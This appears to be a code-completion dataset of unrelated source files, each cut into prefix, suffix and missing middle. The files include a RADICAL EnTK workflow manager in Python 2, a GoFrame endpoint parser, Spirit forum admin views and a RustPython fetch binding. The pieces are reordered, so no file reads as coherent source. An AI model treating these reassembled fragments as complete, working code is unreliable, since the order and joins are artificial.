r := hkdf.New(sha1.New, secret, salt, []byte("ss-subkey"))
common.Must2(io.ReadFull(r, outkey))
}
|
createAesGcm
|
appmanager.py
|
__copyright__ = "Copyright 2017-2018, http://radical.rutgers.edu"
__author__ = "Vivek Balasubramanian <[email protected]>"
__license__ = "MIT"
import radical.utils as ru
from radical.entk.exceptions import *
from radical.entk.pipeline.pipeline import Pipeline
from radical.entk.stage.stage import Stage
from radical.entk.task.task import Task
from radical.entk.utils.prof_utils import write_session_description
from radical.entk.utils.prof_utils import write_workflow
from wfprocessor import WFprocessor
import sys
import time
import os
import Queue
import pika
import json
from threading import Thread, Event
from radical.entk import states
class AppManager(object):
"""
An application manager takes the responsibility of setting up the communication infrastructure, instantiates the
ResourceManager, TaskManager, WFProcessor objects and all their threads and processes. This is the Master object
running in the main process and is designed to recover from errors from all other objects, threads and processes.
:Arguments:
:config_path: Url to config path to be read for AppManager
:hostname: host rabbitmq server is running
:port: port at which rabbitmq can be accessed
:reattempts: number of attempts to re-invoke any failed EnTK components
:resubmit_failed: resubmit failed tasks (True/False)
:autoterminate: terminate resource reservation upon execution of all tasks of first workflow (True/False)
:write_workflow: write workflow and mapping to rts entities to a file (post-termination)
:rts: Specify RTS to use. Current options: 'mock', 'radical.pilot' (default if unspecified)
:rmq_cleanup: Cleanup all queues created in RabbitMQ server for current execution (default is True)
:rts_config: Configuration for the RTS, accepts {"sandbox_cleanup": True/False,"db_cleanup": True/False} when RTS is RP
:name: Name of the Application. It should be unique between executions. (default is randomly assigned)
"""
def __init__(self,
config_path=None,
hostname=None,
port=None,
reattempts=None,
resubmit_failed=None,
autoterminate=None,
write_workflow=None,
rts=None,
rmq_cleanup=None,
rts_config=None,
name=None):
# Create a session for each EnTK script execution
if name:
self._name = name
self._sid = name
else:
self._name= str()
self._sid = ru.generate_id('re.session', ru.ID_PRIVATE)
self._read_config(config_path, hostname, port, reattempts,
resubmit_failed, autoterminate, write_workflow,
rts, rmq_cleanup, rts_config)
# Create an uid + logger + profiles for AppManager, under the sid
# namespace
path = os.getcwd() + '/' + self._sid
self._uid = ru.generate_id('appmanager.%(item_counter)04d', ru.ID_CUSTOM, namespace=self._sid)
self._logger = ru.Logger('radical.entk.%s' % self._uid, path=path, targets=['2','.'])
self._prof = ru.Profiler(name='radical.entk.%s' % self._uid, path=path)
self._report = ru.Reporter(name='radical.entk.%s' % self._uid)
self._report.info('EnTK session: %s\n' % self._sid)
self._prof.prof('create amgr obj', uid=self._uid)
self._report.info('Creating AppManager')
self._resource_manager = None
# RabbitMQ Queues
self._pending_queue = list()
self._completed_queue = list()
# Global parameters to have default values
self._mqs_setup = False
self._resource_desc = None
self._task_manager = None
self._workflow = None
self._cur_attempt = 1
self._shared_data = list()
self._rmq_ping_interval = os.getenv('RMQ_PING_INTERVAL', 10)
self._logger.info('Application Manager initialized')
self._prof.prof('amgr obj created', uid=self._uid)
self._report.ok('>>ok\n')
def _read_config(self, config_path, hostname, port, reattempts,
resubmit_failed, autoterminate, write_workflow,
rts, rmq_cleanup, rts_config):
if not config_path:
config_path = os.path.dirname(os.path.abspath(__file__))
config = ru.read_json(os.path.join(config_path, 'config.json'))
self._mq_hostname = hostname if hostname else str(config['hostname'])
self._port = port if port else config['port']
self._reattempts = reattempts if reattempts else config['reattempts']
self._resubmit_failed = resubmit_failed if resubmit_failed is not None else config['resubmit_failed']
self._autoterminate = autoterminate if autoterminate is not None else config['autoterminate']
self._write_workflow = write_workflow if write_workflow is not None else config['write_workflow']
self._rts = rts if rts in ['radical.pilot', 'mock'] else str(config['rts'])
self._rmq_cleanup = rmq_cleanup if rmq_cleanup is not None else config['rmq_cleanup']
self._rts_config = rts_config if rts_config is not None else config['rts_config']
self._num_pending_qs = config['pending_qs']
self._num_completed_qs = config['completed_qs']
# ------------------------------------------------------------------------------------------------------------------
# Getter functions
# ------------------------------------------------------------------------------------------------------------------
@property
def name(self):
"""
Name for the application manager. Allows the user to setup the name of
the application manager, as well as, its session ID. This name should be
unique between different EnTK executions, otherwise it will produce an
error.
:getter: Returns the name of the application manager
:setter: Assigns the name of the application manager
:type: String
"""
return self._name
@property
def sid(self):
"""
Get the session ID of the current EnTK execution
:getter: Returns the session ID of the EnTK execution
:type: String
"""
return self._sid
@property
def resource_desc(self):
"""
:getter: Returns the resource description
:setter: Assigns a resource description
"""
return self._resource_desc
@property
def workflow(self):
"""
:getter: Return the workflow assigned for execution
:setter: Assign workflow to be executed
"""
return self._workflow
@property
def shared_data(self):
"""
:getter: Return list of filenames that are shared between multiple tasks of the application
:setter: Assign a list of names of files that need to be staged to the remote machine
"""
return self._shared_data
# ------------------------------------------------------------------------------------------------------------------
# Setter functions
# ------------------------------------------------------------------------------------------------------------------
@name.setter
def name(self, value):
if not isinstance(value, str):
raise TypeError(expected_type=str, actual_type=type(value))
else:
self._name = value
@resource_desc.setter
def resource_desc(self, value):
if self._rts == 'radical.pilot':
from radical.entk.execman.rp import ResourceManager
self._resource_manager = ResourceManager(resource_desc=value,
sid=self._sid,
rts_config=self._rts_config)
elif self._rts == 'mock':
from radical.entk.execman.mock import ResourceManager
self._resource_manager = ResourceManager(resource_desc=value,
sid=self._sid)
self._report.info('Validating and assigning resource manager')
if self._resource_manager._validate_resource_desc():
self._resource_manager._populate()
self._resource_manager.shared_data = self._shared_data
else:
self._logger.error('Could not validate resource description')
raise
self._report.ok('>>ok\n')
@workflow.setter
def workflow(self, workflow):
|
@shared_data.setter
def shared_data(self, data):
if not isinstance(data, list):
data = [data]
for val in data:
if not isinstance(val, str):
raise TypeError(expected_type=str, actual_type=type(val))
if self._resource_manager:
self._resource_manager.shared_data = data
# ------------------------------------------------------------------------------------------------------------------
# Public methods
# ------------------------------------------------------------------------------------------------------------------
def run(self):
"""
**Purpose**: Run the application manager. Once the workflow and resource manager have been assigned. Invoking this
method will start the setting up the communication infrastructure, submitting a resource request and then
submission of all the tasks.
"""
try:
# Set None objects local to each run
self._wfp = None
self._sync_thread = None
self._terminate_sync = Event()
self._resubmit_failed = False
self._cur_attempt = 1
if not self._workflow:
self._logger.error('No workflow assigned currently, please check your script')
raise MissingError(obj=self._uid, missing_attribute='workflow')
if not self._resource_manager:
self._logger.error(
'No resource manager assigned currently, please create and add a valid resource manager')
raise MissingError(obj=self._uid, missing_attribute='resource_manager')
self._prof.prof('amgr run started', uid=self._uid)
# Setup rabbitmq stuff
if not self._mqs_setup:
self._report.info('Setting up RabbitMQ system')
setup = self._setup_mqs()
if not setup:
self._logger.error('RabbitMQ system not available')
raise EnTKError(text="RabbitMQ setup failed")
self._mqs_setup = True
self._report.ok('>>ok\n')
# Create WFProcessor object
self._prof.prof('creating wfp obj', uid=self._uid)
self._wfp = WFprocessor(sid=self._sid,
workflow=self._workflow,
pending_queue=self._pending_queue,
completed_queue=self._completed_queue,
mq_hostname=self._mq_hostname,
port=self._port,
resubmit_failed=self._resubmit_failed)
self._wfp._initialize_workflow()
self._workflow = self._wfp.workflow
# Submit resource request if not resource allocation done till now or
# resubmit a new one if the old one has completed
if self._resource_manager:
res_alloc_state = self._resource_manager.get_resource_allocation_state()
if (not res_alloc_state) or (res_alloc_state in self._resource_manager.get_completed_states()):
self._logger.info('Starting resource request submission')
self._prof.prof('init rreq submission', uid=self._uid)
self._resource_manager._submit_resource_request()
else:
self._logger.error(
'Cannot run without resource manager, please create and assign a resource manager')
raise EnTKError(text='Missing resource manager')
# Start synchronizer thread
if not self._sync_thread:
self._logger.info('Starting synchronizer thread')
self._sync_thread = Thread(target=self._synchronizer, name='synchronizer-thread')
self._prof.prof('starting synchronizer thread', uid=self._uid)
self._sync_thread.start()
# Start WFprocessor
self._logger.info('Starting WFProcessor process from AppManager')
self._wfp.start_processor()
self._report.ok('All components created\n')
# Create tmgr object only if it does not already exist
if self._rts == 'radical.pilot':
from radical.entk.execman.rp import TaskManager
elif self._rts == 'mock':
from radical.entk.execman.mock import TaskManager
if not self._task_manager:
self._prof.prof('creating tmgr obj', uid=self._uid)
self._task_manager = TaskManager(sid=self._sid,
pending_queue=self._pending_queue,
completed_queue=self._completed_queue,
mq_hostname=self._mq_hostname,
rmgr=self._resource_manager,
port=self._port
)
self._logger.info('Starting task manager process from AppManager')
self._task_manager.start_manager()
self._task_manager.start_heartbeat()
active_pipe_count = len(self._workflow)
finished_pipe_uids = []
# We wait till all pipelines of the workflow are marked
# complete
while ((active_pipe_count > 0) and
(self._wfp.workflow_incomplete()) and
(self._resource_manager.get_resource_allocation_state() not
in self._resource_manager.get_completed_states())):
if active_pipe_count > 0:
for pipe in self._workflow:
with pipe.lock:
if (pipe.completed) and (pipe.uid not in finished_pipe_uids):
self._logger.info('Pipe %s completed' % pipe.uid)
finished_pipe_uids.append(pipe.uid)
active_pipe_count -= 1
self._logger.info('Active pipes: %s' % active_pipe_count)
if (not self._sync_thread.is_alive()) and (self._cur_attempt <= self._reattempts):
self._sync_thread = Thread(target=self._synchronizer,
name='synchronizer-thread')
self._logger.info('Restarting synchronizer thread')
self._prof.prof('restarting synchronizer', uid=self._uid)
self._sync_thread.start()
self._cur_attempt += 1
if (not self._wfp.check_processor()) and (self._cur_attempt <= self._reattempts):
"""
If WFP dies, both child threads are also cleaned out.
We simply recreate the wfp object with a copy of the workflow
in the appmanager and start the processor.
"""
self._prof.prof('recreating wfp obj', uid=self._uid)
self._wfp = WFProcessor(
sid=self._sid,
workflow=self._workflow,
pending_queue=self._pending_queue,
completed_queue=self._completed_queue,
mq_hostname=self._mq_hostname,
port=self._port,
resubmit_failed=self._resubmit_failed)
self._logger.info('Restarting WFProcessor process from AppManager')
self._wfp.start_processor()
self._cur_attempt += 1
if (not self._task_manager.check_heartbeat()) and (self._cur_attempt <= self._reattempts):
"""
If the tmgr process or heartbeat dies, we simply start a
new process using the start_manager method. We do not
need to create a new instance of the TaskManager object
itself. We stop and start a new instance of the
heartbeat thread as well.
"""
self._prof.prof('restarting tmgr process and heartbeat', uid=self._uid)
self._logger.info('Terminating heartbeat thread')
self._task_manager.terminate_heartbeat()
self._logger.info('Terminating tmgr process')
self._task_manager.terminate_manager()
self._logger.info('Restarting task manager process')
self._task_manager.start_manager()
self._logger.info('Restarting heartbeat thread')
self._task_manager.start_heartbeat()
self._cur_attempt += 1
self._prof.prof('start termination', uid=self._uid)
# Terminate threads in following order: wfp, helper, synchronizer
self._logger.info('Terminating WFprocessor')
self._wfp.terminate_processor()
self._logger.info('Terminating synchronizer thread')
self._terminate_sync.set()
self._sync_thread.join()
self._logger.info('Synchronizer thread terminated')
if self._autoterminate:
self.resource_terminate()
if self._write_workflow:
write_workflow(self._workflow, self._sid)
self._prof.prof('termination done', uid=self._uid)
except KeyboardInterrupt:
self._prof.prof('start termination', uid=self._uid)
self._logger.error('Execution interrupted by user (you probably hit Ctrl+C), ' +
'trying to cancel enqueuer thread gracefully...')
# Terminate threads in following order: wfp, helper, synchronizer
if self._wfp:
self._logger.info('Terminating WFprocessor')
self._wfp.terminate_processor()
if self._task_manager:
self._logger.info('Terminating task manager process')
self._task_manager.terminate_manager()
self._task_manager.terminate_heartbeat()
if self._sync_thread:
self._logger.info('Terminating synchronizer thread')
self._terminate_sync.set()
self._sync_thread.join()
self._logger.info('Synchronizer thread terminated')
if self._resource_manager:
self._resource_manager._terminate_resource_request()
self._prof.prof('termination done', uid=self._uid)
raise KeyboardInterrupt
except Exception, ex:
self._prof.prof('start termination', uid=self._uid)
self._logger.exception('Error in AppManager: %s' % ex)
# Terminate threads in following order: wfp, helper, synchronizer
if self._wfp:
self._logger.info('Terminating WFprocessor')
self._wfp.terminate_processor()
if self._task_manager:
self._logger.info('Terminating task manager process')
self._task_manager.terminate_manager()
self._task_manager.terminate_heartbeat()
if self._sync_thread:
self._logger.info('Terminating synchronizer thread')
self._terminate_sync.set()
self._sync_thread.join()
self._logger.info('Synchronizer thread terminated')
if self._resource_manager:
self._resource_manager._terminate_resource_request()
self._prof.prof('termination done', uid=self._uid)
raise
def resource_terminate(self):
if self._task_manager:
self._logger.info('Terminating task manager process')
self._task_manager.terminate_manager()
self._task_manager.terminate_heartbeat()
if self._resource_manager:
self._resource_manager._terminate_resource_request()
if os.environ.get('RADICAL_ENTK_PROFILE', False):
write_session_description(self)
if self._rmq_cleanup:
self._cleanup_mqs()
self._report.info('All components terminated\n')
# ------------------------------------------------------------------------------------------------------------------
# Private methods
# ------------------------------------------------------------------------------------------------------------------
def _setup_mqs(self):
"""
**Purpose**: Setup RabbitMQ system on the client side. We instantiate queue(s) 'pendingq-*' for communication
between the enqueuer thread and the task manager process. We instantiate queue(s) 'completedq-*' for
communication between the task manager and dequeuer thread. We instantiate queue 'sync-to-master' for
communication from enqueuer/dequeuer/task_manager to the synchronizer thread. We instantiate queue
'sync-ack' for communication from synchronizer thread to enqueuer/dequeuer/task_manager.
Details: All queues are durable: Even if the RabbitMQ server goes down, the queues are saved to disk and can
be retrieved. This also means that after an erroneous run the queues might still have unacknowledged messages
and will contain messages from that run. Hence, in every new run, we first delete the queue and create a new
one.
"""
try:
self._prof.prof('init mqs setup', uid=self._uid)
self._logger.debug('Setting up mq connection and channel')
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=self._mq_hostname, port=self._port))
mq_channel = mq_connection.channel()
self._logger.debug('Connection and channel setup successful')
self._logger.debug('Setting up all exchanges and queues')
qs = [
'%s-tmgr-to-sync' % self._sid,
'%s-cb-to-sync' % self._sid,
'%s-enq-to-sync' % self._sid,
'%s-deq-to-sync' % self._sid,
'%s-sync-to-tmgr' % self._sid,
'%s-sync-to-cb' % self._sid,
'%s-sync-to-enq' % self._sid,
'%s-sync-to-deq' % self._sid
]
for i in range(1, self._num_pending_qs + 1):
queue_name = '%s-pendingq-%s' % (self._sid, i)
self._pending_queue.append(queue_name)
qs.append(queue_name)
for i in range(1, self._num_completed_qs + 1):
queue_name = '%s-completedq-%s' % (self._sid, i)
self._completed_queue.append(queue_name)
qs.append(queue_name)
f = open('.%s.txt' % self._sid, 'w')
for q in qs:
# Durable Qs will not be lost if rabbitmq server crashes
mq_channel.queue_declare(queue=q)
f.write(q + '\n')
f.close()
self._logger.debug('All exchanges and queues are setup')
self._prof.prof('mqs setup done', uid=self._uid)
return True
except Exception, ex:
self._logger.error('Error setting RabbitMQ system: %s' % ex)
raise
def _cleanup_mqs(self):
try:
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=self._mq_hostname, port=self._port))
mq_channel = mq_connection.channel()
mq_channel.queue_delete(queue='%s-tmgr-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-cb-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-enq-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-deq-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-tmgr' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-cb' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-enq' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-deq' % self._sid)
for i in range(1, self._num_pending_qs + 1):
queue_name = '%s-pendingq-%s' % (self._sid, i)
mq_channel.queue_delete(queue=queue_name)
for i in range(1, self._num_completed_qs + 1):
queue_name = '%s-completedq-%s' % (self._sid, i)
mq_channel.queue_delete(queue=queue_name)
except Exception as ex:
self._logger.exception('Message queues not deleted, error: %s' % ex)
raise
def _synchronizer(self):
"""
**Purpose**: Thread in the master process to keep the workflow data
structure in appmanager up to date. We receive pipelines, stages and
tasks objects directly. The respective object is updated in this master
process.
Details: Important to note that acknowledgements of the type
channel.basic_ack() is an acknowledgement to the server that the msg
was received. This is not to be confused with the Ack sent to the
enqueuer/dequeuer/task_manager through the sync-ack queue.
"""
try:
self._prof.prof('synchronizer started', uid=self._uid)
self._logger.info('synchronizer thread started')
def task_update(msg, reply_to, corr_id, mq_channel):
completed_task = Task()
completed_task.from_dict(msg['object'])
self._logger.info('Received %s with state %s' % (completed_task.uid, completed_task.state))
found_task = False
# Traverse the entire workflow to find the correct task
for pipe in self._workflow:
if not pipe.completed:
if completed_task.parent_pipeline['uid'] == pipe.uid:
for stage in pipe.stages:
if completed_task.parent_stage['uid'] == stage.uid:
for task in stage.tasks:
if (completed_task.uid == task.uid)and(completed_task.state != task.state):
task.state = str(completed_task.state)
self._logger.debug('Found task %s with state %s' %
(task.uid, task.state))
if completed_task.path:
task.path = str(completed_task.path)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % task.uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
self._report.ok('Update: ')
self._report.info('Task %s in state %s\n' % (task.uid, task.state))
found_task = True
if not found_task:
# If there was a Stage update, but the Stage was not found in any of the Pipelines. This
# means that this was a Stage that was added during runtime and the AppManager does not
# know about it. The current solution is going to be: add it to the workflow object in the
# AppManager via the synchronizer.
self._prof.prof('Adap: adding new task')
self._logger.info('Adding new task %s to parent stage: %s' % (completed_task.uid,
stage.uid))
stage.add_tasks(completed_task)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % completed_task.uid)
self._prof.prof('Adap: added new task')
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
self._report.ok('Update: ')
self._report.info('Task %s in state %s\n' %
(completed_task.uid, completed_task.state))
def stage_update(msg, reply_to, corr_id, mq_channel):
completed_stage = Stage()
completed_stage.from_dict(msg['object'])
self._logger.info('Received %s with state %s' % (completed_stage.uid, completed_stage.state))
found_stage = False
# Traverse the entire workflow to find the correct stage
for pipe in self._workflow:
if not pipe.completed:
if completed_stage.parent_pipeline['uid'] == pipe.uid:
self._logger.info('Found parent pipeline: %s' % pipe.uid)
for stage in pipe.stages:
if (completed_stage.uid == stage.uid)and(completed_stage.state != stage.state):
self._logger.debug('Found stage %s' % stage.uid)
stage.state = str(completed_stage.state)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % stage.uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
self._report.ok('Update: ')
self._report.info('Stage %s in state %s\n' % (stage.uid, stage.state))
found_stage = True
if not found_stage:
# If there was a Stage update, but the Stage was not found in any of the Pipelines. This
# means that this was a Stage that was added during runtime and the AppManager does not
# know about it. The current solution is going to be: add it to the workflow object in the
# AppManager via the synchronizer.
self._prof.prof('Adap: adding new stage', uid=self._uid)
self._logger.info('Adding new stage %s to parent pipeline: %s' % (completed_stage.uid,
pipe.uid))
pipe.add_stages(completed_stage)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % completed_stage.uid)
self._prof.prof('Adap: adding new stage', uid=self._uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
def pipeline_update(msg, reply_to, corr_id, mq_channel):
completed_pipeline = Pipeline()
completed_pipeline.from_dict(msg['object'])
self._logger.info('Received %s with state %s' % (completed_pipeline.uid, completed_pipeline.state))
# Traverse the entire workflow to find the correct pipeline
for pipe in self._workflow:
if not pipe.completed:
if (completed_pipeline.uid == pipe.uid)and(completed_pipeline.state != pipe.state):
pipe.state = str(completed_pipeline.state)
self._logger.info('Found pipeline %s, state %s, completed %s' % (pipe.uid,
pipe.state,
pipe.completed)
)
# Reply with ack msg to the sender
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % pipe.uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
# Keep the assignment of the completed flag after sending the acknowledgment
# back. Otherwise the MainThread takes lock over the pipeline because of logging
# and profiling
if completed_pipeline.completed:
pipe._completed_flag.set()
self._report.ok('Update: ')
self._report.info('Pipeline %s in state %s\n' % (pipe.uid, pipe.state))
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=self._mq_hostname, port=self._port))
mq_channel = mq_connection.channel()
last = time.time()
while not self._terminate_sync.is_set():
#-------------------------------------------------------------------------------------------------------
# Messages between tmgr Main thread and synchronizer -- only Task objects
method_frame, props, body = mq_channel.basic_get(queue='%s-tmgr-to-sync' % self._sid)
"""
The message received is a JSON object with the following structure:
msg = {
'type': 'Pipeline'/'Stage'/'Task',
'object': json/dict
}
"""
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-tmgr' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------
# Messages between callback thread and synchronizer -- only Task objects
method_frame, props, body = mq_channel.basic_get(queue='%s-cb-to-sync' % self._sid)
"""
The message received is a JSON object with the following structure:
msg = {
'type': 'Pipeline'/'Stage'/'Task',
'object': json/dict
}
"""
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-cb' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------
# Messages between enqueue thread and synchronizer -- Task, Stage or Pipeline
method_frame, props, body = mq_channel.basic_get(queue='%s-enq-to-sync' % self._sid)
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-enq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Stage':
stage_update(msg, '%s-sync-to-enq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Pipeline':
pipeline_update(msg, '%s-sync-to-enq' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------
# Messages between dequeue thread and synchronizer -- Task, Stage or Pipeline
method_frame, props, body = mq_channel.basic_get(queue='%s-deq-to-sync' % self._sid)
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-deq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Stage':
stage_update(msg, '%s-sync-to-deq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Pipeline':
pipeline_update(msg, '%s-sync-to-deq' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
# Appease pika cos it thinks the connection is dead
now = time.time()
if now - last >= self._rmq_ping_interval:
mq_connection.process_data_events()
last = now
self._prof.prof('terminating synchronizer', uid=self._uid)
except KeyboardInterrupt:
self._logger.error('Execution interrupted by user (you probably hit Ctrl+C), ' +
'trying to terminate synchronizer thread gracefully...')
raise KeyboardInterrupt
except Exception, ex:
self._logger.exception('Unknown error in synchronizer: %s. \n Terminating thread' % ex)
raise
# ------------------------------------------------------------------------------------------------------------------
|
self._prof.prof('assigning workflow', uid=self._uid)
for p in workflow:
if not isinstance(p, Pipeline):
self._logger.info('workflow type incorrect')
raise TypeError(expected_type=['Pipeline', 'set of Pipelines'], actual_type=type(p))
p._validate()
self._workflow = workflow
self._logger.info('Workflow assigned to Application Manager')
|
xdg.go
|
package main
import (
"path/filepath"
)
// Loosely
// http://standards.freedesktop.org/basedir-spec/basedir-spec-0.8.html
// We don't handle XDG_CONFIG_DIRS yet
func XdgConfigDir(env Env, programName string) string {
if env["XDG_CONFIG_HOME"] != "" {
return filepath.Join(env["XDG_CONFIG_HOME"], programName)
} else if env["HOME"] != ""
|
// In theory we could also read /etc/passwd and look for the home matching the process' Uid
return ""
}
|
{
return filepath.Join(env["HOME"], ".config", programName)
}
|
gsvc_endpoint.go
|
// Copyright GoFrame Author(https://goframe.org). All Rights Reserved.
//
// This Source Code Form is subject to the terms of the MIT License.
// If a copy of the MIT was not distributed with this file,
// You can obtain one at https://github.com/gogf/gf.
// Package gsvc provides service registry and discovery definition.
package gsvc
import (
"fmt"
"github.com/gogf/gf/v2/errors/gcode"
"github.com/gogf/gf/v2/errors/gerror"
"github.com/gogf/gf/v2/text/gstr"
"github.com/gogf/gf/v2/util/gconv"
)
// LocalEndpoint implements interface Endpoint.
type LocalEndpoint struct {
host string // host can be either IPv4 or IPv6 address.
port int // port is port as commonly known.
}
// NewEndpoint creates and returns an Endpoint from address string of pattern "host:port",
// eg: "192.168.1.100:80".
func
|
(address string) Endpoint {
array := gstr.SplitAndTrim(address, endpointHostPortDelimiter)
if len(array) != 2 {
panic(gerror.NewCodef(
gcode.CodeInvalidParameter,
`invalid address "%s" for creating endpoint, endpoint address is like "ip:port"`,
address,
))
}
return &LocalEndpoint{
host: array[0],
port: gconv.Int(array[1]),
}
}
// Host returns the IPv4/IPv6 address of a service.
func (e *LocalEndpoint) Host() string {
return e.host
}
// Port returns the port of a service.
func (e *LocalEndpoint) Port() int {
return e.port
}
// String formats and returns the Endpoint as a string, like: 192.168.1.100:80.
func (e *LocalEndpoint) String() string {
return fmt.Sprintf(`%s:%d`, e.host, e.port)
}
|
NewEndpoint
|
user.py
|
#-*- coding: utf-8 -*-
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import get_user_model
from django.contrib import messages
from django.utils.translation import ugettext as _
from spirit.utils.decorators import administrator_required
from spirit.forms.admin import UserEditForm
User = get_user_model()
@administrator_required
def user_edit(request, user_id):
user = get_object_or_404(User, pk=user_id)
if request.method == 'POST':
form = UserEditForm(data=request.POST, instance=user)
if form.is_valid():
form.save()
messages.info(request, _("This profile has been updated!"))
return redirect(request.GET.get("next", request.get_full_path()))
else:
form = UserEditForm(instance=user)
return render(request, 'spirit/admin/user/user_edit.html', {'form': form, })
@administrator_required
def user_list(request):
users = User.objects.all()
return render(request, 'spirit/admin/user/user_list.html', {'users': users, })
@administrator_required
def user_admins(request):
users = User.objects.filter(is_administrator=True)
return render(request, 'spirit/admin/user/user_admins.html', {'users': users, })
@administrator_required
def user_mods(request):
users = User.objects.filter(is_moderator=True, is_administrator=False)
return render(request, 'spirit/admin/user/user_mods.html', {'users': users, })
@administrator_required
def user_unactive(request):
|
users = User.objects.filter(is_active=False)
return render(request, 'spirit/admin/user/user_unactive.html', {'users': users, })
|
|
flask_sample_program.py
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
def sample_program():
|
return "This is sample flask program"
|
|
browser_module.rs
|
use crate::{convert, js_module::PyPromise, vm_class::weak_vm, wasm_builtins::window};
use js_sys::Promise;
use rustpython_vm::{
builtins::{PyDictRef, PyStrRef},
function::{ArgCallable, IntoPyObject, OptionalArg},
|
};
use wasm_bindgen::{prelude::*, JsCast};
use wasm_bindgen_futures::JsFuture;
enum FetchResponseFormat {
Json,
Text,
ArrayBuffer,
}
impl FetchResponseFormat {
fn from_str(vm: &VirtualMachine, s: &str) -> PyResult<Self> {
match s {
"json" => Ok(FetchResponseFormat::Json),
"text" => Ok(FetchResponseFormat::Text),
"array_buffer" => Ok(FetchResponseFormat::ArrayBuffer),
_ => Err(vm.new_type_error("Unkown fetch response_format".into())),
}
}
fn get_response(&self, response: &web_sys::Response) -> Result<Promise, JsValue> {
match self {
FetchResponseFormat::Json => response.json(),
FetchResponseFormat::Text => response.text(),
FetchResponseFormat::ArrayBuffer => response.array_buffer(),
}
}
}
#[derive(FromArgs)]
struct FetchArgs {
#[pyarg(named, default)]
response_format: Option<PyStrRef>,
#[pyarg(named, default)]
method: Option<PyStrRef>,
#[pyarg(named, default)]
headers: Option<PyDictRef>,
#[pyarg(named, default)]
body: Option<PyObjectRef>,
#[pyarg(named, default)]
content_type: Option<PyStrRef>,
}
fn browser_fetch(url: PyStrRef, args: FetchArgs, vm: &VirtualMachine) -> PyResult {
let FetchArgs {
response_format,
method,
headers,
body,
content_type,
} = args;
let response_format = match response_format {
Some(s) => FetchResponseFormat::from_str(vm, s.as_str())?,
None => FetchResponseFormat::Text,
};
let mut opts = web_sys::RequestInit::new();
match method {
Some(s) => opts.method(s.as_str()),
None => opts.method("GET"),
};
if let Some(body) = body {
opts.body(Some(&convert::py_to_js(vm, body)));
}
let request = web_sys::Request::new_with_str_and_init(url.as_str(), &opts)
.map_err(|err| convert::js_py_typeerror(vm, err))?;
if let Some(headers) = headers {
let h = request.headers();
for (key, value) in headers {
let key = vm.to_str(&key)?;
let value = vm.to_str(&value)?;
h.set(key.as_str(), value.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))?;
}
}
if let Some(content_type) = content_type {
request
.headers()
.set("Content-Type", content_type.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))?;
}
let window = window();
let request_prom = window.fetch_with_request(&request);
let future = async move {
let val = JsFuture::from(request_prom).await?;
let response = val
.dyn_into::<web_sys::Response>()
.expect("val to be of type Response");
JsFuture::from(response_format.get_response(&response)?).await
};
Ok(PyPromise::from_future(future).into_object(vm))
}
